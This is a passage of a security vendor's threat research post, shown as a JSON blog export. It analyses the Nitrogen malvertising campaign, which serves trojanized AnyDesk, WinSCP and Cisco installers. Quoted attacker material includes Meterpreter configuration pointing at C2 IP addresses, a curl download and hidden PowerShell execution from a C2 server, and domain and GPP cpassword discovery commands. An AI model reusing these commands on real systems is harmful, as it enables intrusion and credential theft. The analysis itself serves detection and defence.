{"id":22546,"date":"2023-07-26T05:20:55","date_gmt":"2023-07-26T13:20:55","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2023\/07\/26\/news-16276\/"},"modified":"2023-07-26T05:20:55","modified_gmt":"2023-07-26T13:20:55","slug":"news-16276","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/07\/26\/news-16276\/","title":{"rendered":"Into the tank with Nitrogen"},"content":{"rendered":"<p><strong>Credit to Author: Gabor Szappanos| Date: Wed, 26 Jul 2023 10:00:04 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>In mid-June, Sophos X-Ops identified a previously unreported initial-access malware campaign leveraging <a href=\"https:\/\/news.sophos.com\/en-us\/2016\/03\/17\/malvertising-learn-more-about-this-pernicious-problem\/\">malicious advertising (malvertising)<\/a> and impersonating legitimate software to compromise business networks.<\/p>\n<p>This campaign &#8211; which we have dubbed <strong>Nitrogen<\/strong> based on strings found in the code &#8211; is a primarily opportunistic attack campaign abusing Google and Bing ads to target users seeking certain IT tools, with the goal of gaining access to enterprise environments to deploy second-stage attack tools such as Cobalt Strike.<\/p>\n<p>Sophos X-Ops has observed the Nitrogen campaign targeting several organizations in the technology and non-profit sectors in North America. Though Sophos mitigated the infections before further hands-on-keyboard activity occurred, we assess it is likely that the threat actors mean to leverage this infection chain to stage compromised environments for ransomware deployment. This assessment is corroborated by recent research from <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\">Trend Micro<\/a> stating it has observed a similar infection chain that led to a <a href=\"https:\/\/news.sophos.com\/en-us\/tag\/blackcat\/\">BlackCat (aka ALPHV)<\/a> ransomware infection.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92934\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png\" alt=\"A flowchart showing a simplified flow for the initial-attack process describedi n the article\" width=\"640\" height=\"394\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png 966w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png?resize=300,184 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-01-1.png?resize=768,472 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: An overview of the observed Nitrogen infection chain<\/em><\/p>\n<p><em>\u00a0<\/em>In this article, we&#8217;ll briefly walk through the infection process, which begins when a user searches for certain popular software packages on Google or Bing.\u00a0 Since there are subtle differences in how this stage goes, we have included three examples of different search-to-infection chains, which includes a twist designed to troll investigators. We then turn to a detailed description of how the malware operates and what happens once the infected file has been downloaded. (A list of MITRE ATT&amp;CK techniques seen in this attack chain is provided at the end of the article.)<\/p>\n<h3>Nitrogen Malware Family<\/h3>\n<p>While investigating this campaign, X-Ops analysts uncovered a new initial access malware family called Nitrogen. The name derives from the components and debug information we found in the samples, which indicate that the developers refer to this project as Nitrogen or Nitronet. The names of these components also indicate a relation to the Metasploit Framework (MSF), which is leveraged in the Nitrogen campaign to generate the reverse shell scripts used in NitrogenStager.<\/p>\n<p>The main components use the following class names:<\/p>\n<ul>\n<li class=\"Codesample\">NitrogenStager<\/li>\n<li class=\"Codesample\">MsfPythonStager<\/li>\n<li class=\"Codesample\">NitronetNativeStager<\/li>\n<li class=\"Codesample\">NitroInstaller<\/li>\n<\/ul>\n<h2>Infection chain<\/h2>\n<p>The observed infection chain starts with malvertising via Google and Bing Ads to lure users to compromised WordPress sites and phishing pages impersonating popular software distribution sites, where they are tricked into downloading trojanized ISO installers.<\/p>\n<p>When downloaded, the installers sideload the malicious NitrogenInstaller DLL containing a legitimate software application bundled with a malicious Python execution environment. The Python package uses Dynamic Link Library (DLL) preloading to execute the malicious NitrogenStager file, which connects to the threat actor\u2019s command-and-control (C2) servers to drop both a Meterpreter shell and Cobalt Strike Beacons onto the targeted system. Throughout the infection chain, the threat actors use uncommon export forwarding and DLL preloading techniques to mask their malicious activity and hinder analysis.<\/p>\n<p>The infection chain involves multiple stages and components, which are still under<br \/> analysis at this writing. The following diagram illustrates our current understanding.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92935\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png\" alt=\"A flow chart showing detail in a portion of the flow of this attack, described later in the text\" width=\"531\" height=\"1056\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png 531w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png?resize=151,300 151w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-02-1.png?resize=515,1024 515w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/a><\/p>\n<p><em>Figure 2: A portion of the Nitrogen infection chain in greater detail<\/em><\/p>\n<h2>Initial infection<\/h2>\n<p>The Nitrogen malvertising campaign leverages Google and Bing Pay-per-Click (PPC) advertisements to impersonate legitimate-looking websites and trick users into downloading malicious Windows Installer files.<\/p>\n<p>Specifically, the campaign appears to be targeting information technology (IT) users, as the advertised sites impersonate popular software such as <strong>AnyDesk <\/strong>(a remote desktop application), <strong>WinSCP <\/strong>(an SFTP\/FTP client for Windows), and <strong>Cisco AnyConnect VPN<\/strong> installers. In one Managed Detection and Response (MDR) case, we also observed the campaign leverage a trojanized installer for<strong> TreeSize Free<\/strong>, which is a free-disk-space manager. These applications are often used for business-related purposes, so it is likely the threat actors chose to impersonate these installers to try to gain access to enterprise networks.<\/p>\n<p>X-Ops analysts have found several trojanized installers deploying the Nitrogen malware package. The filenames used by those installers are listed below. We provide the relevant hashes in the IoC file on our GitHub; note that some filenames were used by more than one trojanized installer.<\/p>\n<ul>\n<li>AnyDesk.iso<\/li>\n<li>AnyDesk_v7.1.11.iso<\/li>\n<li>AnyDesk_v7.1.iso<\/li>\n<li>cisco-anyconnect-4.iso<\/li>\n<li>TreeSizeFreeSetup.iso<\/li>\n<li>winscp.iso<\/li>\n<li>WinSCP_setup.iso<\/li>\n<li>WinSCP-5.21.8-Setup.iso<\/li>\n<li>WinSCP-6.1-Setup.iso<\/li>\n<\/ul>\n<h3>Example: Downloading \u201cWinSCP\u201d<\/h3>\n<p>As reported by <a href=\"https:\/\/infosec.exchange\/@malwareinfosec\/110539178322032927\">@malwareinfosec<\/a>, when a user searches Google for WinSCP, a Google Ad will pop up referencing \u2018Secure File Transfer \u2013 For Windows\u2019 on the site softwareinteractivo[.]com, which is a phishing page that impersonates a guidance blog for system administrators. In our investigation, we observed the searches that redirect in this fashion appear to be geographically limited, but the overall pattern of those limitations is unclear. Our investigations have made us aware of hundreds of brands co-opted for malvertising of this sort across multiple campaigns in recent months.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92936\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png\" alt=\"The page displayed at the fraudulent &quot;softwareinteractivo&quot; site\" width=\"640\" height=\"493\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png 1590w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=300,231 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=768,592 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=1024,789 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-03-1.png?resize=1536,1183 1536w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 3: Suspicious <\/em><em>softwareinteractivo[.]com site, reached by clicking a malvertisement<\/em><\/p>\n<p>When the advertisement on softwareinteractivo[.]com is clicked, it redirects the user to a fake download page for WinSCP 6.1 (winsccp[.]com), which drops a malicious ISO file on the user\u2019s computer.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92937\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png\" alt=\"The fake WinSCP download site; note that the URL is similar but not the same\" width=\"640\" height=\"316\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png?resize=300,148 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-04.png?resize=768,379 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 4: Winsccp[.]com is a malicious website mimicking the real WinSCP download page (winscp.net)<\/em><\/p>\n<p>Notably, if a user or researcher tries to directly visit the site winsccp[.]com by typing in the URL instead of going through the ad, it redirects to a YouTube video of Rick Astley\u2019s classic \u201cNever Gonna Give You Up\u201d \u2013 effectively rick-rolling researchers. We assess the phishing site is likely inspecting referrer headers to confirm the user has arrived there via a search engine, which is a tactic commonly observed in malvertising campaigns.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92938\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png\" alt=\"A collage of three screen shots showing that typing in the site URL directly got us rickrolled\" width=\"498\" height=\"428\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png 498w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-05.png?resize=300,258 300w\" sizes=\"auto, (max-width: 498px) 100vw, 498px\" \/><\/a><\/p>\n<p><em>Figure 5: Never gonna give (trolling) up (Image credit: Jerome Segura [<\/em><a href=\"https:\/\/infosec.exchange\/@malwareinfosec\/110539178322032927\"><em>@malwareinfosec<\/em><\/a><em>]<\/em><em>)<\/em><\/p>\n<p>The redirect chain from the ad site (in this case, Google) to the fake website to the malicious .ISO is as follows; we have redacted the arguments for each specific step, though we note that softwareinteractivo passes the Google click identifier (gclid) unchanged:<\/p>\n<ol>\n<li>https:\/\/www[.]googleadservices[.]com\/pagead\/[snip]<\/li>\n<li>https:\/\/softwareinteractivo[.]com\/streamlining-team-collaboration-the-power-of-for-seamless-file-sharing\/[gclid snip]<\/li>\n<li>https:\/\/winsccp[.]com\/HPVrxkWv?[gclid snip]<\/li>\n<li>https:\/\/winsccp[.]com\/eng\/download[.]php<\/li>\n<li>https:\/\/protemaq[.]com\/wp-content\/update\/iso\/6[.]1\/tusto\/WinSCP-6[.]1-Setup[.]iso<\/li>\n<\/ol>\n<h3>Example: Downloading \u201cCisco AnyConnect\u201d<\/h3>\n<p>In addition to using phishing pages, the threat actors also hosted malware on seemingly compromised WordPress sites, such as mypondsoftware[.]com\/cisco (which mimics the legitimate Cisco download site). Notably, all other links on the myponsdsoftware[.]com point to legitimate cisco.com web pages, except for the download link for this particular installer (Cisco AnyConnect Secure Mobility Client v4.x), which directs to a phishing page delivering the malicious Nitrogen package.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92939\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png\" alt=\"A WordPress-based site with (stolen) Cisco branding, serving the malicious download\" width=\"640\" height=\"340\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png 1254w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=300,159 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=768,408 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-06.png?resize=1024,544 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 6: <\/em><em>A compromised WordPress site (<\/em><em>mypondsoftware[.]com) <\/em><em>distributing Trojanized Cisco AnyConnect Secure Mobility Client v4.x<\/em><\/p>\n<h3>Example: Downloading \u201cTreeSize\u201d<\/h3>\n<p>Our analysts also uncovered a malvertisement directing users to a download site impersonating JAM Software&#8217;s TreeSize Free program, which is primarily used for scanning disk space usage. In the case we observed, it appears the user was searching for tools to clean up their filesystem while debugging QuickBooks, which led them to a series of Bing ads for TreeSize. Though the user first clicked on an advertisement for the legitimate TreeSize Free Jam Software site, they shortly pivoted back to Bing and clicked on a secondary advertisement that directed them to tresize[.]com , which served the malicious ISO. Upon the user downloading the malicious ISO file &#8220;TreeSizeFreeSetup.iso\u201d hosted on the WordPress site, it was promptly mounted on the system.<\/p>\n<p>Similar to the other distribution sites we found, when the user navigates to the tresize[.]com domain directly, it redirects to YouTube to display the Rick Astley video.<\/p>\n<h2>DLL Sideloading<\/h2>\n<p>As noted above, when the users download the trojanized installers, they drop as ISO images on the infected computer. These files then mount in Windows Explorer and can be mapped to a drive, where the content will be available in that drive.<\/p>\n<p>One of the files inside the ISO image is the msiexec.exe Windows tool, renamed to install.exe or setup.exe. When executed, the renamed msiexec.exe sideloads the malicious msi.dll (NitrogenInstaller) file stored in the same image.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92940\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png\" alt=\"A file directory showing two files, install and msi.dll\" width=\"638\" height=\"105\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png 638w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-07.png?resize=300,49 300w\" sizes=\"auto, (max-width: 638px) 100vw, 638px\" \/><\/a><\/p>\n<p><em>Figure 7: Content of the trojanized installers<\/em><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/05\/03\/doubled-dll-sideloading-dragon-breath\/\">Dynamic link library (DLL) sideloading<\/a> is a popular tactic used by threat actors to mask malicious activity under the guise of a legitimate process. Typically, threat actors attempt to avoid error messages by inserting dummy functions into the sideloaded DLLs for the exports needed by the clean loader executable. In rare cases &#8212; such as when the DLL is an open-source component and can be easily recompiled by the attackers &#8212; the malicious DLL may implement the full functionality of the original legitimate DLL.<\/p>\n<p>In this Nitrogen campaign, however, the threat actors use another tactic that is less commonly seen in sideloading attempts: using DLL proxying by forwarding exported functions (except for the main function MsiLoadStringW that contains the malicious code) to the legitimate msi.dll that resides in the system directory. Though DLL proxying is not a particularly novel technique, it typically occurs in DLL hijacking attacks rather than in DLL sideloading or preloading.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92941\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png\" alt=\"A file directory showing the exported functions\" width=\"640\" height=\"143\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png 870w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png?resize=300,67 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-08.png?resize=768,171 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 8: Exported functions of <\/em><em>msi.dll<\/em><\/p>\n<h3>NitrogenInstaller<\/h3>\n<p>The sideloaded msi.dll file &#8211; which the threat actors call NitrogenInstaller \u2013 proceeds to drop a clean installer for the legitimate decoy application (e.g., Inno installer for WinSCP) alongside two Python packages: a legitimate Python archive and a trojanized Python package in an encrypted file of 8-10MB containing the malicious python310.dll file (NitrogenStager). The latter is encrypted with the AES CBC algorithm, with the encryption key hardcoded in the installer DLL.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92942\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png\" alt=\"A deceptive normal-looking install window\" width=\"515\" height=\"403\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png 515w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-09.png?resize=300,235 300w\" sizes=\"auto, (max-width: 515px) 100vw, 515px\" \/><\/a><\/p>\n<p><em>Figure 9: Installation of the benign WinSCP dropped by NitrogenInstaller; appears normal, but in the background, there are unwanted passengers<\/em><\/p>\n<p>Some of the NitrogenInstaller samples contained debug information, such as PDB paths, which gives an insight into the project structure:<\/p>\n<pre>Y:nitronetnitrogenx64Release - msi.dllNitrogen.pdb    Y:x64Release - msi.dllNitrogen.pdb<\/pre>\n<p>In addition to dropping the clean installer and Python packages, NitrogenInstaller also attempts to elevate its privileges by executing a <a href=\"https:\/\/blogs.quickheal.com\/uac-bypass-using-cmstp\/\">User Access Control (UAC) bypass<\/a> using the CMSTPLUA CLSID (<em>Elevation:Administrator!new:{guid}<\/em>). Various malware and ransomware families have used this method, including <u>LockBit<\/u> and <a href=\"https:\/\/www.nozominetworks.com\/blog\/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs\/\">BlackMatter<\/a><u>.<\/u><\/p>\n<p>The NitrogenInstaller DLL then creates a registry run key to establish persistence; this key is named &#8220;Python&#8221; (HKEY_USERS&lt;User SID&gt;SoftwareMicrosoftWindowsCurrentVersionRunPython). We also observe a related scheduled task named &#8220;OneDrive Security&#8221; pointing to the binary C:UsersPublicMusicpythonpythonw.exe, which has an execution interval of five minutes.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92943\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png\" alt=\"A screen capture showing the Registry with the keys as described in the text\" width=\"640\" height=\"226\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png?resize=300,106 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-10.png?resize=768,271 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 10:\u00a0 The DLL creates a key<\/em><\/p>\n<h4><em>Python Packages<\/em><\/h4>\n<p>As noted above, NitrogenInstaller drops the following two Python packages:<\/p>\n<p>&nbsp;<\/p>\n<p>The two directories in Figure 11 show the differences between the legitimate version of the application (via BeaconPack, on the left) and the malicious version (on the right). Note the differences between the clean and the malicious python310.dll, and also the variation in directories as called out in the table above.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92944\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png\" alt=\"Side-by-side images of two file directories, showing the file-detail differences between the legitimate and fake python311.dlls\" width=\"640\" height=\"295\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png 1036w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=300,138 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=768,354 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-11.png?resize=1024,471 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 11: On the left (green border), the BeaconPack version of the application contains the original, larger python310.dll with legitimate version information; on the right (red border), the malicious version is smaller and has no version number, file description, or company data<\/em><\/p>\n<p>So why did the threat actors drop a legitimate Python package alongside a legitimate one? Well, the NitrogenStager Python package is unviable; it cannot execute Python scripts. Normally, the Python scripts would run upon execution when pythonw.exe calls the Py_Main function from the python310.dll in the Python package. However, this function in the NitrogenStager Python package is replaced by malicious connect-back code, meaning the script engine will not be loaded and scripts cannot be executed.<\/p>\n<p>However, for the threat actors to be able to conduct later stages of the attack, such as the installation of Cobalt Strike Beacons, they need a working Python environment. This explains why the threat actors dropped the legitimate BeaconPack Python Package: to execute Python code needed later in the infection chain.<\/p>\n<h4><em>NitrogenStager<\/em><\/h4>\n<p>To load the NitrogenStager DLL in the malicious Python package, the threat actors leverage <a href=\"https:\/\/support.microsoft.com\/en-gb\/topic\/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1\">DLL preloading<\/a>, which takes advantage of Windows\u2019 own DLL search order when an application attempts to load a library without specifying the full path. In several observed cases, the threat actors renamed the legitimate DLL (python310.dll) to python311.dll (which is stored in the same directory) and copied their own specially crafted malicious stager (NitrogenStager) into the directory under the name python310.dll.<\/p>\n<p>Notably, in the latest version, we noticed the threat actors &#8220;upgraded&#8221; the malicious Python package to version 3.11, where they staged the malicious NitrogenStager under the name python311.dll and renamed the original clean Python DLL to python311x.dll.<\/p>\n<p>As noted above, the NitrogenStager Python package is unable to execute Python scripts, as its main function is replaced with malicious connect-back code and all other exports in the package are forwarded to the original legitimate Python DLL (python311.dll):<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92945\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png\" alt=\"A DLL Export Viewer screen showing the malicious DLL\" width=\"640\" height=\"161\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png 781w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png?resize=300,76 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-12.png?resize=768,194 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 12: Python310.dll refers to the export in Python311.dll as python311.{exportname}<\/em><\/p>\n<p>This tactic is similar to the export forwarding technique used earlier when sideloading msi.dll; however, in this case, the original clean DLL was part of the package as a renamed DLL instead of already residing on the system.<\/p>\n<h3>C2 Staging<\/h3>\n<p>The malicious connect-back code in the Py_Main function runs automatically upon execution. Sophos detected NitrogenStager connecting to C2 servers using four different protocols (TCP, TCP over SSL, HTTP, HTTPS). The package contains a separate script for each protocol used (tcp:\/\/, tcpssl:\/\/, http:\/\/, https:\/\/), each of which has the functionality to connect to the C2 server, decode responses (base64+inflate), and execute them. The stagers for the protocols are based on public domain tools likely generated by <a href=\"https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-msfvenom.html\">msfvenom<\/a>, which uses standard command-line options to generate Metasploit payloads.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92946\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png\" alt=\"A Python script as described in text\" width=\"640\" height=\"354\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png?resize=300,166 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-13.png?resize=768,425 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 13: Python script for http:\/\/<\/em><\/p>\n<p>The base64-encoded compressed scripts receive the host address and port number. The decoded scripts are fairly standard; the only notable difference is the specific user-agent.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92947\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png\" alt=\"The decoded handler, as described in text\" width=\"640\" height=\"147\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png?resize=300,69 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-14.png?resize=768,176 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 14: Handler for https:\/\/<\/em><\/p>\n<p>We observed multiple variations of the NitrogenStager file (python310.dll), and in some samples, string constants such as the C2 addresses are clearly visible in the code:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92948\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png\" alt=\"A screen of NitrogenStager code\" width=\"610\" height=\"479\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png 610w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-15.png?resize=300,236 300w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p><em>Figure 15: NitrogenStager sample code <\/em><\/p>\n<p>Like the NitrogenInstaller sample, some of the NitrogenStager samples also contain debug information, including PDB paths:<\/p>\n<pre>Z:projectsnitrogen_vsx64Release - python310embNitrogen.pdb    Y:x64Release - python310embNitrogen.pdb    Y:nitronetnitrogenx64Release - msi.dllNitrogen.pdb<\/pre>\n<h2>Meterpreter shell<\/h2>\n<p>This next-stage script downloaded by the NitrogenStager DLL is essentially a customization of this <a href=\"https:\/\/github.com\/rapid7\/metasploit-payloads\/blob\/master\/python\/meterpreter\/meterpreter.py\">Meterpreter script,<\/a> with the configuration variables modified. For example, one of the servers delivers the script with these variables on the http:\/\/ protocol:<\/p>\n<pre>HTTP_CONNECTION_URL = 'http:\/\/104.234.119[.]16:8880\/Tu6UHNJiKqMAdBVgZOhOfQWLz0QvKbDdGjzQfqCdxVaakl7csNUiwEdQzgC_lyE\/'    HTTP_USER_AGENT = 'Mozilla\/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/16.1 Mobile\/15E148 Safari\/604.1'    PAYLOAD_UUID = '4eee941cd2622aa30074156064e84e7d'    SESSION_GUID = '386bab57d91a44868452fbf55ce59ff9'<\/pre>\n<p>And these variables on the https:\/\/ protocol:<\/p>\n<pre>HTTP_CONNECTION_URL = 'hxxps:\/\/104.234.119[.]16:4425\/NZAna530Nip9AWgVGZ0wvQmQqVlNzF3vDZ8VNfagijnmurLzImArKHfA\/'    HTTP_USER_AGENT = 'Mozilla\/5.0 (iPad; CPU OS 16_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/16.1 Mobile\/15E148 Safari\/604.1'    PAYLOAD_UUID = '3590276b9df4362a7d016815199d30bd'    SESSION_GUID = '208fc213c50f4816a3e1e097015c0d3f'<\/pre>\n<p>Once executed, the Python scripts establish a Meterpreter reverse TCP shell, which allows threat actors to remotely execute code on the compromised machine.<\/p>\n<h2>Manual sessions<\/h2>\n<p>In one of the observed cases, the threat actors invoke several commands through the open session, switching to hands-on-keyboard activity:<\/p>\n<pre>curl\u00a0 -k hxxps:\/\/172.86.123[.]127\/python\/ton.zip -o C:\\users\\public\\pictures\\ton.zip    powershell\u00a0 -w hidden -command Expand-Archive C:\\users\\public\\pictures\\ton.zip -DestinationPath tonw.exe\u00a0 work1.py    tonw.exe\u00a0 work8.py    tonw.exe\u00a0 work4.py<\/pre>\n<p>These manual commands retrieve a ZIP file from a C2 server (172.86.123[.]127), and also download and execute an additional Python environment (Python Package 3), which invokes a series of Python scripts that lead to in-memory execution of Cobalt Strike beacons. Python Package 3 runs from the Pictures subfolder within the Public directory .<\/p>\n<p>The threat actors also run commands to perform discovery and enumerate the domain:<\/p>\n<pre>net\u00a0 group \"Workstation Admins\" \/domain    findstr\u00a0 \/S \/I cpassword \\\\&lt;REDACTED&gt;\\sysvol\\&lt;REDACTED&gt;\\policies\\*.xml    net\u00a0 group \"{redacted}\" \/domain    net\u00a0 localgroup administrators    net\u00a0 group \"Domain Admins\" \/domain    net\u00a0 group \"{redacted}\" \/domain    net\u00a0 group \"{redacted}\" \/domain    ipconfig\u00a0 \/all    net\u00a0 group \/domain<\/pre>\n<p>The command findstr\u00a0 \/S \/I cpassword \\\\&lt;REDACTED&gt;\\sysvol\\&lt;REDACTED&gt;\\policies\\*.xml searches for Group Policy Preferences (GPP) settings in XML files, where the &#8220;cpassword&#8221; string may be present. This activity is detected as <strong>EQL-WIN-DIS-PRC-FINDSTR-CPASSWORD-1<\/strong> by Sophos.<\/p>\n<h3>Cobalt Strike servers<\/h3>\n<p>The suspected manual sessions above refer to Python scripts work1.py through work9.py, which are files the threat actors downloaded from the Cobalt Strike C2 server 172.86.123[.]127. (Hashes for the files 